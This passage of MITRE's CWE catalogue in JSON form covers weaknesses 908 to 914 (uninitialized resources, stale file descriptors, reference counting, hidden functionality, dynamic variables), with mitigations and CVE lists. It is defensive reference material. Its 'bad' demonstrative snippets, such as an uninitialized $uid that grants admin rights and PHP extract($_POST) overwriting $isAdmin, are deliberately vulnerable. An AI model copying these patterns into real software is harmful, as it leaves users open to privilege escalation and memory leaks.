resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all required steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile the software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"Chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"Chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-436"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"909":{"attr":{"@_ID":"909","@_Name":"Missing Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not initialize a critical resource.","Extended_Description":"Many resources require initialization before they can be properly used. If a resource is not initialized, it could contain unpredictable or expired data, or it could be initialized to defaults that are invalid. This can have security implications when the resource is expected to have certain properties or values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"908","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all specified steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"910":{"attr":{"@_ID":"910","@_Name":"Use of Expired File Descriptor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a file descriptor after it has been closed.","Extended_Description":"After a file descriptor for a particular file or device has been released, it can be reused. The code might not write to the original file, since the reused file descriptor might reference a different file or device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stale file descriptor"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could read data from the wrong file."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Accessing a file descriptor that has been closed can cause a crash."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"Exact"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"911":{"attr":{"@_ID":"911","@_Name":"Improper Update of Reference Count","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count.","Extended_Description":"Reference counts can be used when tracking how many objects contain a reference to a particular resource, such as in memory management or garbage collection. When the reference count reaches zero, the resource can be de-allocated or reused because there are no more objects that use it. If the reference count accidentally reaches zero, then the resource might be released too soon, even though it is still in use. If all objects no longer use the resource, but the reference count is not zero, then the resource might not ever be released.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"772","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2004-0114","Description":"Reference count for shared memory not decremented when a function fails, potentially allowing unprivileged users to read kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0114"},{"Reference":"CVE-2006-3741","Description":"chain: improper reference count tracking leads to file descriptor consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741"},{"Reference":"CVE-2007-1383","Description":"chain: integer overflow in reference counter causes the same variable to be destroyed twice.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1383"},{"Reference":"CVE-2007-1700","Description":"Incorrect reference count calculation leads to improper object destruction and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700"},{"Reference":"CVE-2008-2136","Description":"chain: incorrect update of reference count leads to memory leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136"},{"Reference":"CVE-2008-2785","Description":"chain/composite: use of incorrect data type for a reference counter allows an overflow of the counter, leading to a free of memory that is still in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785"},{"Reference":"CVE-2008-5410","Description":"Improper reference counting leads to failure of cryptographic operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5410"},{"Reference":"CVE-2009-1709","Description":"chain: improper reference counting in a garbage collection routine leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1709"},{"Reference":"CVE-2009-3553","Description":"chain: reference count not correctly maintained when client disconnects during a large operation, leading to a use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-3624","Description":"Reference count not always incremented, leading to crash or code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3624"},{"Reference":"CVE-2010-0176","Description":"improper reference counting leads to expired pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0176"},{"Reference":"CVE-2010-0623","Description":"OS kernel increments reference count twice but only decrements once, leading to resource consumption and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0623"},{"Reference":"CVE-2010-2549","Description":"OS kernel driver allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2549"},{"Reference":"CVE-2010-4593","Description":"improper reference counting leads to exhaustion of IP addresses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4593"},{"Reference":"CVE-2011-0695","Description":"Race condition causes reference counter to be decremented prematurely, leading to the destruction of still-active object and an invalid pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695"},{"Reference":"CVE-2012-4787","Description":"improper reference counting leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-884"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"912":{"attr":{"@_ID":"912","@_Name":"Hidden Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software\'s users or administrators.","Extended_Description":"Hidden functionality can take many forms, such as intentionally malicious code, \\"Easter Eggs\\" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the software\'s attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"133"}},{"attr":{"@_CAPEC_ID":"190"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"913":{"attr":{"@_ID":"913","@_Name":"Improper Control of Dynamically-Managed Code Resources","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.","Extended_Description":"Many languages offer powerful features that allow the programmer to dynamically create or modify existing code, or resources used by code such as variables and objects. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can directly influence these code resources in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of acceptable values."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that it does not need to be dynamically managed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"914":{"attr":{"@_ID":"914","@_Name":"Improper Control of Dynamically-Identified Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-identified variables.","Extended_Description":"Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal program variables that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that internal program variables do not need to be dynamically identified."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed 